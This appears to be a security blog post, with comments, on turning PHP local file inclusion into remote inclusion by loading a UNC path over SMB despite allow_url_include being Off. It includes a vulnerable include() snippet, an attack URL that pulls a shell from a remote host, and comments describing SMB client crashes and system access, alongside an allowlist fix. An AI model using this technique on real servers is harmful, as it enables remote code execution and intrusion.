The reincarnation of the RFI

Hey! Remember the good old days when the web spouted RFIs everywhere?

We miss those days.

So Fredrik and I figured out a new way to reincarnate the old dusty RFIs!
It relies on an unexpected feature in PHP that lets a script communicate with external servers even though allow_url_include = Off.

We eventually played around with an RFI playground we made and found out SMB is supported.

So what? SMB is only for internal networks?

Not so fast! If an attacker writes a rogue SMB server, just like Jelmer did in the "MySQL Network Exploitation Toolkit", he could remotely load a shell or send back a malicious payload to exploit one of the many vulnerabilities against SAMBA.

This obviously requires a server whose only RFI "patch" is relying on allow_url_include = Off.

vulnerable.php (the request parameter reaches include() without any validation; with a UNC path such as \\host\share\file, PHP opens it over SMB even when allow_url_include is Off):
[php]
...
if(isset($_GET['file']))
{
    // unvalidated user input used directly as the include path
    include($_GET['file']);
}
...
[/php]
Example URL:

http://www.vulnerablesite.com/includefile.php?file=\\1.3.3.7\shell.txt%00

And that's how you may turn an LFI into an RFI using SMB.
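As an added example that is not part of the original post, here is the same include pattern in a form that does not depend on allow_url_include at all: the request value is only ever used as a key into a fixed allowlist, so no path (local, UNC or URL) supplied by the client reaches include(). The page keys, the pages/ directory and the resolve_include() helper are assumptions for illustration.

```php
<?php
// Added example (not from the original post): allowlist-based include.
// ALLOWED_PAGES, the pages/ directory and resolve_include() are assumed names.

declare(strict_types=1);

// Only these keys can ever be included; the request value is never a path.
const ALLOWED_PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

/**
 * Map a user-supplied page key to an absolute file inside $baseDir.
 * Returns null when the key is not allowlisted, the file is missing,
 * or the resolved path does not stay under $baseDir.
 */
function resolve_include(string $key, string $baseDir): ?string
{
    if (!array_key_exists($key, ALLOWED_PAGES)) {
        // Unknown key: "\\1.3.3.7\shell.txt", "http://...", "../" all stop here.
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . ALLOWED_PAGES[$key]);
    // realpath() returns false for a missing file; also confirm containment,
    // so a bad allowlist entry or symlink cannot point outside $baseDir.
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

$key    = $_GET['file'] ?? 'home';
$target = resolve_include($key, __DIR__ . '/pages');
if ($target === null) {
    http_response_code(404);
    exit('Unknown page');
}
include $target;
```

With this shape the %00 truncation and the UNC trick from the example URL have nothing to act on, because include() only ever receives a path the application itself built.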

Note: This is still a theory, no PoC available yet.

Ciao bella!

Sup, I'm Mathias and I was born in 1991. It feels like I should really write something here.

6 Comments

  1. Tweets that mention The reincarnation of the RFI -- Topsy.com says:

    [...] This post was mentioned on Twitter by AckAck, AckAck. AckAck said: New Post: The reincarnation of the RFI ( http://h.ackack.net/the-reincarnation-of-the-rfi.html ): Hey! Remember the good old day... [...]

  2. Jelmer de Hen says:

    I just tested this with the MySQL Network Exploitation Toolkit and it works great! Windows SMB exploits work against the SMB client through this, I made my box BSoD with this.

  3. Fredrik Nordberg Almroth says:

    Hehe awesome :)
    As expected then ;)
    Hurray! No more pseudo lame LFIs!

  4. Jelmer de Hen says:

    Too bad it only works for Windows because of the use of PHP's SMB file wrappers; still it's good for getting system level access on Windows servers or just generally exploring the internal network. You can also generate DNS and ARP packets with this which is pretty nice and fingerprinting the server will also be easy through SMB.

  5. Fredrik Nordberg Almroth says:

    Indeed. I noticed as well, it does also send NBNS (NetBIOS Name Service) packets over IP broadcast (255.255.255.255).
    But you failed to get it working on *nix?
